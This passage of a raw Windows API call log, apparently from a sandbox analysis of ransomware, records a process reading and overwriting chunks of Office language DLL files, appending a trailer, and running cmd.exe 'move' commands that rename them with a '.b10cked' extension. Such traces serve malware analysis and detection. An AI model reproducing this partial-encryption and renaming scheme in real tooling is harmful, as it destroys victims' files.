(in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x35478 [0168.488] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0168.503] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0168.503] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.503] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x35960 [0168.503] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.503] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0168.503] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.503] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x35960 [0168.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.504] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.521] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xbcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xbcaf, lpOverlapped=0x0) returned 1 [0168.535] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.535] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.536] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xbcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xbcaf, lpOverlapped=0x0) returned 1 [0168.537] SetFilePointer (in: hFile=0x114, lDistanceToMove=-109743, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1acb1 [0168.537] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.538] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xbcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xbcaf, lpOverlapped=0x0) returned 1 [0168.540] SetFilePointer (in: hFile=0x114, lDistanceToMove=-109743, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1acb1 [0168.540] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.540] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xbcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xbcaf, lpOverlapped=0x0) returned 1 [0168.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.DLL.trx_dll", cchWideChar=20, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0168.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLLIBR.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0168.550] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x35960 [0168.550] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0168.551] CloseHandle (hObject=0x114) returned 1 [0168.792] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX") returned 0x3c [0168.795] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0168.796] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, 
dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x4b0, dwThreadId=0x808)) returned 1 [0168.864] CloseHandle (hObject=0x1b4) returned 1 [0168.864] CloseHandle (hObject=0x114) returned 1 [0168.864] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0168.864] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0168.864] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0168.864] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.864] ReleaseMutex (hMutex=0xf8) returned 1 [0168.864] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.864] ReleaseMutex (hMutex=0xf8) returned 1 [0168.864] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.864] ReleaseMutex (hMutex=0xf8) returned 1 [0168.865] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.865] ReleaseMutex (hMutex=0xf8) returned 1 [0168.865] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0168.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.866] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22565570230) returned 1 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.869] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.869] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x9f078 [0168.869] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0168.872] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x9f560 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x9f560 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.872] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.873] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.900] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.901] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, 
lpOverlapped=0x0) returned 1 [0168.903] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.903] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.904] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.904] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0168.904] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0168.904] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.907] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.912] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0168.914] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0168.914] WriteFile (in: hFile=0x114, 
lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.915] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.915] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0168.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7f560 [0168.916] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.917] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.918] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0168.920] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7f560 [0168.920] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.920] WriteFile (in: hFile=0x114, 
lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.921] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0168.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0168.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLLIBR.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0168.927] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x9f560 [0168.927] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0168.929] CloseHandle (hObject=0x114) returned 1 [0168.941] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX") returned 0x3c [0168.942] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0168.943] CreateProcessW (in: 
lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x838, dwThreadId=0x974)) returned 1 [0169.073] CloseHandle (hObject=0x1b4) returned 1 [0169.073] CloseHandle (hObject=0x114) returned 1 [0169.073] 